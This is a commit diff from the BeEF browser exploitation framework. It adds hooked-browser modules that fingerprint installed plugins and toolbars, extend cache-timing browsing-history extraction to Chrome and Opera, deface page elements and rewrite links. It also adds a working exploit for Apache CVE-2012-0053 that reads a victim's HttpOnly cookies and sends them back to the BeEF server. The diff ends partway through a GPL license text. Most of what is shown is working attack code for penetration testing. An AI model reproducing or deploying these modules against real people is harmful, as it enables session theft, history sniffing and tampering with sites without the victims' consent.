beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Firefox extensions failed');
}
} else if(beef.browser.isIE()) {
try {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Internet Explorer extensions is not supported');
} catch(e) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Internet Explorer extensions failed');
}
}
});

4
modules/browser/detect_extensions/config.yaml
View File

@@ -8,8 +8,8 @@ beef:
detect_extensions:
enable: true
category: "Browser"
name: "Detect Chrome/Firefox Extensions"
description: "This module detects Extensions in Chrome and Firefox "
name: "Detect Extensions"
description: "This module detects extensions installed in Google Chrome and Mozilla Firefox."
authors: ["koto", "bcoles", "nbblrr"]
target:
working:

14
modules/browser/detect_foxit/command.js Normal file
View File

@@ -0,0 +1,14 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = ( beef.browser.hasFoxit() )? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "foxit="+result);
});

15
modules/browser/detect_foxit/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_foxit:
enable: true
category: "Browser"
name: "Detect Foxit Reader"
description: "This module will check if the browser has Foxit Reader Plugin."
authors: ["javuto"]
target:
working: ["All"]

14
modules/browser/detect_foxit/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_foxit < BeEF::Core::Command
def post_execute
content = {}
content['foxit'] = @datastore['foxit']
save content
end
end

14
modules/browser/detect_quicktime/command.js Normal file
View File

@@ -0,0 +1,14 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = (beef.browser.hasQuickTime())? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "quicktime="+result);
});

15
modules/browser/detect_quicktime/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_quicktime:
enable: true
category: "Browser"
name: "Detect QuickTime"
description: "This module will check if the browser has Quicktime support."
authors: ["bcoles"]
target:
working: ["All"]

14
modules/browser/detect_quicktime/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_quicktime < BeEF::Core::Command
def post_execute
content = {}
content['quicktime'] = @datastore['quicktime']
save content
end
end

14
modules/browser/detect_realplayer/command.js Normal file
View File

@@ -0,0 +1,14 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = ( beef.browser.hasRealPlayer() )? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "realplayer="+result);
});

15
modules/browser/detect_realplayer/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_realplayer:
enable: true
category: "Browser"
name: "Detect RealPlayer"
description: "This module will check if the browser has RealPlayer support."
authors: ["gcattani"]
target:
working: ["All"]

14
modules/browser/detect_realplayer/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_realplayer < BeEF::Core::Command
def post_execute
content = {}
content['realplayer'] = @datastore['realplayer']
save content
end
end

14
modules/browser/detect_silverlight/command.js Normal file
View File

@@ -0,0 +1,14 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = (beef.browser.hasSilverlight())? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "silverlight="+result);
});

15
modules/browser/detect_silverlight/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_silverlight:
enable: true
category: "Browser"
name: "Detect Silverlight"
description: "This module will check if the browser has Silverlight support."
authors: ["bcoles"]
target:
working: ["ALL"]

14
modules/browser/detect_silverlight/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_silverlight < BeEF::Core::Command
def post_execute
content = {}
content['silverlight'] = @datastore['silverlight']
save content
end
end

61
modules/browser/detect_toolbars/command.js Normal file
View File

@@ -0,0 +1,61 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var toolbar_ua = new Array (
new Array (" Alexa Toolbar", " Alexa"),
new Array (" AskTbS-PV", " Ask"),
new Array (" BRI", " Bing"),
new Array (" GTB", " Google"),
new Array (" SU ", " Stumble Upon")
)
var toolbar_id = new Array (
new Array ("AlexaCustomScriptId", " Alexa")
)
var result = '';
var separator = ", ";
// CHECK USER-AGENT
for (var i = 0; i < toolbar_ua.length; i++) {
var agentRegex = new RegExp( toolbar_ua[i][0], 'g' );
if ( agentRegex.exec(navigator.userAgent) ) {
result += toolbar_ua[i][1] + separator;
}
}
// CHECK ELEMENT ID (DOM)
for (var i = 0; i < toolbar_id.length; i++) {
var element = document.getElementById( toolbar_id[i][0] );
if ( typeof(element) != 'undefined' && element != null ) {
result += toolbar_id[i][1] + separator;
}
}
// ENDING
if ( result != '' ) {
result = result.slice(0, -separator.length);
} else if ( result == '' ) {
result = " no toolbars detected";
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "toolbars="+result);
});

15
modules/browser/detect_toolbars/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
Detect_toolbars:
enable: true
category: "Browser"
name: "Detect Toolbars"
description: "Detects which browser toolbars are installed."
authors: ["gcattani"]
target:
working: ["All"]

14
modules/browser/detect_toolbars/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_toolbars < BeEF::Core::Command
def post_execute
content = {}
content['toolbars'] = @datastore['toolbars']
save content
end
end

14
modules/browser/detect_vlc/command.js Normal file
View File

@@ -0,0 +1,14 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = ( beef.browser.hasVLC() )? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "vlc="+result);
});

15
modules/browser/detect_vlc/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_vlc:
enable: true
category: "Browser"
name: "Detect VLC"
description: "This module will check if the browser has VLC plugin."
authors: ["nbblrr"]
target:
working: ["IE", "FF", "C"]

14
modules/browser/detect_vlc/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_vlc < BeEF::Core::Command
def post_execute
content = {}
content['vlc'] = @datastore['vlc']
save content
end
end

13
modules/browser/detect_wmp/command.js Normal file
View File

@@ -0,0 +1,13 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = ( beef.browser.hasWMP() )? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "wmp="+result);
});

15
modules/browser/detect_wmp/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_wmp:
enable: true
category: "Browser"
name: "Detect Windows Media Player"
description: "This module will check if the browser has the Windows Media Player plugin installed."
authors: ["gcattani"]
target:
working: ["All"]

14
modules/browser/detect_wmp/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_wmp < BeEF::Core::Command
def post_execute
content = {}
content['wmp'] = @datastore['wmp']
save content
end
end

90
modules/browser/get_visited_domains/command.js
View File

@@ -16,6 +16,8 @@ var tries = 0;
var isIE = 0;
var isFF = 0;
var isO = 0;
var isC = 0;
/*******************************
* SUB-MS TIMER IMPLEMENTATION *
@@ -131,6 +133,56 @@ if (beef.browser.isIE() == 1) {
var MAX_ATTEMPTS = 1;
}
if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
/****************
* SCANNED URLS *
****************/
var targets = [
{ 'category': 'Social networks' },
{ 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] },
{ 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] },
{ 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz',
'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] },
{ 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] },
{ 'category': 'Content platforms' },
{ 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] },
{ 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] },
{ 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] },
{ 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] },
{ 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] },
{ 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] },
{ 'category': 'Online media' },
{ 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] },
{ 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css',
'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] },
{ 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] },
{ 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] },
{ 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] },
{ 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] },
{ 'category': 'Commerce' },
{ 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12',
'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] },
{ 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] },
{ 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] },
{ 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] },
{ 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] },
{ 'category': 'Coding' },
{ 'name': 'GitHub', 'urls': [ 'https://a248.e.akamai.net/assets.github.com/stylesheets/bundles/github-fa63b2501ea82170d5b3b1469e26c6fa6c3116dc.css' ] },
{ 'category': 'Security' },
{ 'name': 'Exploit DB', 'urls': [ 'http://www.exploit-db.com/wp-content/themes/exploit/style.css' ] },
{ 'name': 'Packet Storm', 'urls': [ 'http://packetstormsecurity.org/img/pss.ico' ] },
{ 'category': 'Email' },
{ 'name': 'Hotmail', 'urls': [ 'https://secure.shared.live.com/~Live.SiteContent.ID/~16.2.9/~/~/~/~/css/R3WinLive1033.css' ] }
];
/*************************
* CONFIGURABLE SETTINGS *
*************************/
var TIME_LIMIT = 3;
var MAX_ATTEMPTS = 1;
}
function sched_call(fn) {
exec_next = fn;
@@ -160,7 +212,9 @@ function perform_check() {
if (beef.browser.isFF() == 1) {
setTimeout(wait_for_read, 1);
}
if(beef.browser.isC() == 1 || beef.browser.isO() == 1){
setTimeout(wait_for_read, 1);
}
}
@@ -188,6 +242,19 @@ function wait_for_read() {
setTimeout(wait_for_read, 0);
}
}
if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
try{
if(frames['f'].location.href != 'about:blank'){
throw 1;
}
frames['f'].stop();
document.getElementById('f').src = 'javascript:"<body onload=\'parent.frame_ready = true\'>"';
setTimeout(wait_for_read2, 1);
} catch(e){
setTimeout(wait_for_read, 1);
}
}
}
function wait_for_read2() {
@@ -213,6 +280,9 @@ function navigate_to_target() {
if (beef.browser.isIE() == 1) {
setTimeout(wait_for_noread, 0);
}
if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
setTimeout(wait_for_noread, 1);
}
urls++;
document.getElementById("f").src = current_url;
}
@@ -248,6 +318,17 @@ function wait_for_noread() {
}
sched_call(wait_for_noread);
}
if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
if (frames['f'].location.href == undefined){
confirm_visited = true;
throw 1;
}
if (cycles++ >= TIME_LIMIT) {
maybe_test_next();
return;
}
setTimeout(wait_for_noread, 1);
}
} catch (e) {
confirmed_visited = true;
maybe_test_next();
@@ -262,6 +343,9 @@ function maybe_test_next() {
if (beef.browser.isIE() == 1) {
document.getElementById("f").src = 'about:blank';
}
if (beef.browser.isC() == 1 || beef.browser.isO() == 1) {
document.getElementById('f').src = 'about:blank';
}
if (target_off < targets.length) {
if (targets[target_off].category) {
//log_text(targets[target_off].category + ':', 'p', 'category');
@@ -312,7 +396,7 @@ function reload(){
/* The handler for "run the test" button on the main page. Dispenses
advice, resets state if necessary. */
function start_stuff() {
if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 ) {
if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 || beef.browser.isC() == 1 || beef.browser.isO() == 1) {
target_off = 0;
attempt = 0;
confirmed_visited = false;
@@ -321,7 +405,7 @@ function start_stuff() {
maybe_test_next();
}
else {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox and Internet Explorer, and probably won\'t work for you.');
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox, Internet Explorer, Chrome and Opera, and probably won\'t work for you.');
}
}

8
modules/browser/get_visited_domains/config.yaml
View File

@@ -9,8 +9,8 @@ beef:
enable: true
category: "Browser"
name: "Get Visited Domains"
description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/"
authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done by Michal Zalewski at http://lcamtuf.coredump.cx/cachetime/"
authors: ["@keith55", "quentin"]
target:
working: ["FF", "IE"]
not_working: ["O", "C", "S"]
working: ["FF", "IE", "O"]
not_working: ["C", "S"]

14
modules/browser/hooked_domain/deface_web_page_component/command.js Normal file
View File

@@ -0,0 +1,14 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = $j('<%= @deface_selector %>').each(function() {
$j(this).html('<%= @deface_content %>');
}).length;
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Defaced "+ result +" elements");
});

15
modules/browser/hooked_domain/deface_web_page_component/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
deface_web_page_component:
enable: true
category: ["Browser", "Hooked Domain"]
name: "Replace Component (Deface)"
description: "Overwrite a particular component of the hooked page."
authors: ["antisnatchor","xntrik"]
target:
user_notify: ['ALL']

22
modules/browser/hooked_domain/deface_web_page_component/module.rb Normal file
View File

@@ -0,0 +1,22 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Deface_web_page_component < BeEF::Core::Command
def self.options
return [
{ 'name' => 'deface_selector', 'description' => 'The jQuery Selector to rewrite', 'ui_label' => 'Target Selector (Using jQuery\'s selector notation)', 'value' => '.headertitle', 'width'=>'200px' },
{ 'name' => 'deface_content', 'description' => 'The HTML to replace within the target', 'ui_label' => 'Deface Content', 'value' => 'BeEF was ere', 'width'=>'200px' }
]
end
def post_execute
content = {}
content['Result'] = @datastore['result']
save content
end
end

10
modules/browser/hooked_domain/link_rewrite_click_events/command.js Normal file
View File

@@ -0,0 +1,10 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+beef.dom.rewriteLinksClickEvents('<%= @url %>')+' links rewritten to <%= @url %>');
});

16
modules/browser/hooked_domain/link_rewrite_click_events/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
link_rewrite_click_events:
enable: true
category: ["Browser", "Hooked Domain"]
name: "Replace HREFs (Click Events)"
description: "This module will rewrite all the href attributes of all matched links using Bilawal Hameed's updating of click event handling. This will hide the target site for all updated links."
authors: ["xntrik", "@bilawalhameed", "passbe"]
target:
not_working: ["O"]
working: ["ALL"]

18
modules/browser/hooked_domain/link_rewrite_click_events/module.rb Normal file
View File

@@ -0,0 +1,18 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Link_rewrite_click_events < BeEF::Core::Command
def self.options
return [
{ 'ui_label'=>'URL', 'name'=>'url', 'description' => 'Target URL', 'value'=>'http://beefproject.com/', 'width'=>'200px' }
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

11
modules/debug/test_http_bind_raw/command.js Normal file
View File

@@ -0,0 +1,11 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=mounted to /beef');
});

15
modules/debug/test_http_bind_raw/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
test_http_bind_raw:
enable: true
category: "Debug"
name: "Test HTTP Bind Raw"
description: "Test the HTTP 'bind_raw' handler."
authors: ["bcoles"]
target:
working: ["All"]

20
modules/debug/test_http_bind_raw/module.rb Normal file
View File

@@ -0,0 +1,20 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Test_http_bind_raw < BeEF::Core::Command
def pre_send
configuration = BeEF::Core::Configuration.instance
xss_hook_url = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html"
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', {'Content-Type'=>'text/html','beef'=>xss_hook_url}, 'hello world!', '/beef', -1)
end
def post_execute
content = {}
content['Result'] = @datastore['result']
save content
end
end

11
modules/debug/test_http_redirect/command.js Normal file
View File

@@ -0,0 +1,11 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=mounted to /redirect');
});

15
modules/debug/test_http_redirect/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
test_http_redirect:
enable: true
category: "Debug"
name: "Test HTTP Redirect"
description: "Test the HTTP 'redirect' handler."
authors: ["bcoles"]
target:
working: ["All"]

18
modules/debug/test_http_redirect/module.rb Normal file
View File

@@ -0,0 +1,18 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Test_http_redirect < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_redirect('http://beefproject.com', '/redirect')
end
def post_execute
content = {}
content['Result'] = @datastore['result']
save content
end
end

75
modules/exploits/apache_cookie_disclosure/command.js Normal file
View File

@@ -0,0 +1,75 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// BASED ON https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08
beef.execute(function() {
function setCookies (good) {
var str = "";
for (var i=0; i< 819; i++) {
str += "z";
}
for (i = 0; i < 10; i++) {
if (good) { // Expire evil cookie
var cookie = "beef" + i + "=;expires=" + new Date(+new Date()-1).toUTCString() + "; path=/;";
} else { // Set evil cookie
var cookie = "beef" + i + "=" + str + "; path=/";
}
document.cookie = cookie;
}
}
function makeRequest() {
setCookies();
function parseCookies () {
var cookie_dict = {};
// React on 400 status
if (xhr.readyState === 4 && xhr.status === 400) {
// Replace newlines and match <pre> content
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
if (content.length) {
// Remove "Cookie:" prefix
content = content[1].replace("Cookie: ", "");
var cookies = content.replace(/beef\d=z+;?/g, '').split(/;/g);
// Add cookies to object
for (var i=0; i<cookies.length; i++) {
var s_c = cookies[i].split('=',2);
cookie_dict[s_c[0]] = s_c[1];
}
}
// Unset malicious cookies
setCookies(true);
var result = JSON.stringify(cookie_dict);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "cookies="+result);
}
}
// Make XHR request
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open("GET", "/", true);
xhr.send(null);
}
makeRequest();
});

15
modules/exploits/apache_cookie_disclosure/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
apache_cookies:
enable: true
category: "Exploits"
name: "Apache Cookie Disclosure"
description: "This module exploits CVE-2012-0053 in order to read the victim's cookies, even if issued with the HttpOnly attribute. The exploit only works if the target server is running Apache HTTP Server 2.2.0 through 2.2.21."
authors: ["gcattani"]
target:
working: ["All"]

14
modules/exploits/apache_cookie_disclosure/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Apache_cookies < BeEF::Core::Command
def post_execute
content = {}
content['apache_cookies'] = @datastore['apache_cookies']
save content
end
end

339
modules/exploits/m0n0wall/COPYING.GPL Normal file
View File

@@ -0,0 +1,339 @@
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991
Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Lesser General Public License instead.) You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
this service if you wish), that you receive source code or can get it
if you want it, that you can change the software or use pieces of it
in new free programs; and that you know you can do these things.
To protect your rights, we need to make restrictions that forbid
anyone to deny you these rights or to ask you to surrender the rights.
These restrictions translate to certain responsibilities for you if you
distribute copies of the software, or if you modify it.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must give the recipients all the rights that
you have. You must make sure that they, too, receive or can get the
source code. And you must show them these terms so they know their
rights.
We protect your rights with two steps: (1) copyright the software, and
(2) offer you this license which gives you legal permission to copy,
distribute and/or modify the software.
Also, for each author's protection and ours, we want to make certain
that everyone understands that there is no warranty for this free
software. If the software is modified by someone else and passed on, we
want its recipients to know that what they have is not the original, so
that any problems introduced by others will not reflect on the original
authors' reputations.
Finally, any free program is threatened constantly by software
patents. We wish to avoid the danger that redistributors of a free
program will individually obtain patent licenses, in effect making the
program proprietary. To prevent this, we have made it clear that any
patent must be licensed for everyone's free use or not licensed at all.
The precise terms and conditions for copying, distribution and
modification follow.
GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0. This License applies to any program or other work which contains
a notice placed by the copyright holder saying it may be distributed
under the terms of this General Public License. The "Program", below,
refers to any such program or work, and a "work based on the Program"
means either the Program or any derivative work under copyright law:
that is to say, a work containing the Program or a portion of it,
either verbatim or with modifications and/or translated into another
language. (Hereinafter, translation is included without limitation in
the term "modification".) Each licensee is addressed as "you".
Activities other than copying, distribution and modification are not
covered by this License; they are outside its scope. The act of
running the Program is not restricted, and the output from the Program
is covered only if its contents constitute a work based on the
Program (independent of having been made by running the Program).
Whether that is true depends on what the Program does.
1. You may copy and distribute verbatim copies of the Program's
source code as you receive it, in any medium, provided that you
conspicuously and appropriately publish on each copy an appropriate
copyright notice and disclaimer of warranty; keep intact all the
notices that refer to this License and to the absence of any warranty;
and give any other recipients of the Program a copy of this License
along with the Program.
You may charge a fee for the physical act of transferring a copy, and
you may at your option offer warranty protection in exchange for a fee.
2. You may modify your copy or copies of the Program or any portion
of it, thus forming a work based on the Program, and copy and
distribute such modifications or work under the terms of Section 1
above, provided that you also meet all of these conditions:
a) You must cause the modified files to carry prominent notices
stating that you changed the files and the date of any change.
b) You must cause any work that you distribute or publish, that in
whole or in part contains or is derived from the Program or any
part thereof, to be licensed as a whole at no charge to all third
parties under the terms of this License.
c) If the modified program normally reads commands interactively
when run, you must cause it, when started running for such
interactive use in the most ordinary way, to print or display an
announcement including an appropriate copyright notice and a
notice that there is no warranty (or else, saying that you provide
a warranty) and that users may redistribute the program under
these conditions, and telling the user how to view a copy of this
License. (Exception: if the Program itself is interactive but
